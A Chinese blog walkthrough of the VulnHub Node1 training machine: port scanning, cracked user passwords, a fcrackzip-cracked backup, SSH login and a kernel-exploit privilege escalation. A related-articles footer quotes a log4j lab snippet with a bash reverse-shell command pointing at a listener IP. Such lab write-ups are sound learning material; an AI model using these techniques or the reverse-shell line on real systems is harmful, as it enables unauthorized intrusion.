实训渗透靶场02|3星vh-lll靶机|vulnhub靶场Node1

2023-10-12 22:40

本文主要是介绍实训渗透靶场02|3星vh-lll靶机|vulnhub靶场Node1,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

写在前面:
此博客仅用于记录个人学习进度,学识浅薄,若有错误观点欢迎评论区指出。欢迎各位前来交流。(部分材料来源网络,若有侵权,立即删除)

实训渗透靶场02|3星vh-lll靶机|vulnhub靶场Node1

  • 3星vh-lll靶机 or vulnhub靶场,Node1
    • 信息搜集
    • 开始渗透
    • 提权
      • 寻找特权指令提权
      • 尝试suid提权-pkexec
      • 利用Ubuntu漏洞

3星vh-lll靶机 or vulnhub靶场,Node1

信息搜集

  • netdiscover扫描目的IP
    在这里插入图片描述
sudo masscan -p0-65535 192.168.231.144 --rate=10000

在这里插入图片描述

  • 发现开放端口为22和3000 访问3000

开始渗透

在这里插入图片描述

  • 3000端口是node

  • 对node.js稍有了解的都知道 3000是node.js的默认端口,简单的说 Node.js 就是运行在服务端的 JavaScript。Node.js 是一个基于Chrome JavaScript 运行时建立的一个平台。

  • Node.js是一个事件驱动I/O服务端JavaScript环境,基于Google的V8引擎,V8引擎执行Javascript的速度非常快,性能非常好。
    在这里插入图片描述

  • 发现可疑路径
    在这里插入图片描述

  • 往上一个目录
    在这里插入图片描述

  • 用户名和密码

  • 使用md5解密解密结果为
    在这里插入图片描述

  • tom:spongebob
    在这里插入图片描述

  • mark:snowflake

在这里插入图片描述

  • myP14ceAdm1nAcc0uNT: manchester

  • 依次尝试登录
    在这里插入图片描述
    在这里插入图片描述

  • 前两个用户的权限较低

  • 使用最后一个成功登录进入并且下载文件
    在这里插入图片描述

  • 发现是base64 进行解码
    在这里插入图片描述

  • 解码发现是一个加密的压缩包安装fcrackzip
    在这里插入图片描述

  • 破解出密码magicword

在这里插入图片描述

  • 打开发现是网站备份
    在这里插入图片描述
  • 进入后,查看app.js

在这里插入图片描述

  • 发现这个账号密码可能为ssh远程登入账号密码尝试登录
  • mark:5AYRft73VtFpc84k
  • 登录成功

在这里插入图片描述

提权

寻找特权指令提权

  • sudo -l

在这里插入图片描述

尝试suid提权-pkexec

  • 查看Y4师傅的博客发现还可以利用pkexec本地提权

利用Ubuntu漏洞

  • 在kali机里,使用自带的exp 尝试提权,搜索是否有Ubuntu 16.04漏洞利用searchsploit Ubuntu 16.04
    在这里插入图片描述

  • 复制对应的c程序
    在这里插入图片描述

  • 复制完成后启动apache服务
    在这里插入图片描述
    在这里插入图片描述

  • 进行编译
    在这里插入图片描述

  • 运行
    在这里插入图片描述

  • 提权成功

这篇关于实训渗透靶场02|3星vh-lll靶机|vulnhub靶场Node1的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/198946

相关文章

BUUCTF靶场[web][极客大挑战 2019]Http、[HCTF 2018]admin

目录   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 [web][HCTF 2018]admin 考点:弱密码字典爆破 四种方法:   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 访问环境 老规矩,我们先查看源代码

Git 的特点—— Git 学习笔记 02

文章目录 Git 简史Git 的特点直接记录快照,而非差异比较近乎所有操作都是本地执行保证完整性一般只添加数据 参考资料 Git 简史 众所周知,Linux 内核开源项目有着为数众多的参与者。这么多人在世界各地为 Linux 编写代码,那Linux 的代码是如何管理的呢?事实是在 2002 年以前,世界各地的开发者把源代码通过 diff 的方式发给 Linus,然后由 Linus

MySQL record 02 part

查看已建数据库的基本信息: show CREATE DATABASE mydb; 注意,是DATABASE 不是 DATABASEs, 命令成功执行后,回显的信息有: CREATE DATABASE mydb /*!40100 DEFAULT CHARACTER SET utf8mb3 / /!80016 DEFAULT ENCRYPTION=‘N’ / CREATE DATABASE myd

GPU 计算 CMPS224 2021 学习笔记 02

并行类型 (1)任务并行 (2)数据并行 CPU & GPU CPU和GPU拥有相互独立的内存空间,需要在两者之间相互传输数据。 (1)分配GPU内存 (2)将CPU上的数据复制到GPU上 (3)在GPU上对数据进行计算操作 (4)将计算结果从GPU复制到CPU上 (5)释放GPU内存 CUDA内存管理API (1)分配内存 cudaErro

滚雪球学MyBatis(02):环境搭建

环境搭建 前言 欢迎回到我们的MyBatis系列教程。在上一期中,我们详细介绍了MyBatis的基本概念、特点以及它与其他ORM框架的对比。通过这些内容,大家应该对MyBatis有了初步的了解。今天,我们将从理论走向实践,开始搭建MyBatis的开发环境。了解并掌握环境搭建是使用MyBatis的第一步,也是至关重要的一步。 环境搭建步骤 在开始之前,我们需要准备一些必要的工具和软件,包括J

SAP学习笔记 - 开发02 - BTP实操流程(账号注册,BTP控制台,BTP集成开发环境搭建)

上一章讲了 BAPI的概念,以及如何调用SAP里面的既存BAPI。 SAP学习笔记 - 开发01 - BAPI是什么?通过界面和ABAP代码来调用BAPI-CSDN博客 本章继续讲开发相关的内容,主要就是BTP的实际操作流程,比如账号注册,登录,BTP集成开发环境的搭建这方面。 目录 1,账号注册 2,BTP登录URL 3,如何在BTP上进行开发? 以下是详细内容。 1,账

log4j靶场,反弹shell

1.用vulhub靶场搭建,首先进入目录CVE-2021-44228中,docker启动命令 2.发现端口是8983,浏览器访问http://172.16.1.18:8983/ 3.用dnslog平台检测dns回显,看看有没有漏洞存在 4.反弹shell到kali(ip为172.16.1.18)的8888端口 bash -i >& /dev/tcp/172.16.1.18

研一实训总结

说长不长说短不短的一个月,从最开始的激动到期间,要中期要兼顾找实习准备笔试面试的焦虑,再到最后一周的加班加点和总结,收获和感触还是蛮多的。 首先,这一个月让我更加全面的认知了完成一个从无到有项目的过程,激发了我对自己工程师职业生涯的向往和对自己有了更广的除了编码以外的要求。 我一直是一个结果导向和追求效率的人,所以在团队合作过程中我们也经历了最开始的不知所措,到争执,再到主动配合和贡献,这个过

浙大数据结构:02-线性结构4 Pop Sequence

这道题我们采用数组来模拟堆栈和队列。 简单说一下大致思路,我们用栈来存1234.....,队列来存输入的一组数据,栈与队列进行匹配,相同就pop 机翻 1、条件准备 stk是栈,que是队列。 tt指向的是栈中下标,front指向队头,rear指向队尾。 初始化栈顶为0,队头为0,队尾为-1 #include<iostream>using namespace std;#defi

【SpringMVC学习02】SpringMVC入门程序

转自:http://blog.csdn.net/yerenyuan_pku/article/details/72231272 现有这样一个需求:使用SpringMVC这个框架实现商品列表的展示。这是我对这个需求的分析:我这里假设请求的url为/itemList.action,由于我想要展示商品列表,所以是并不需要传递参数的,再次是这里仅仅是一个SpringMVC的一个入门小程序,并不会与MyBa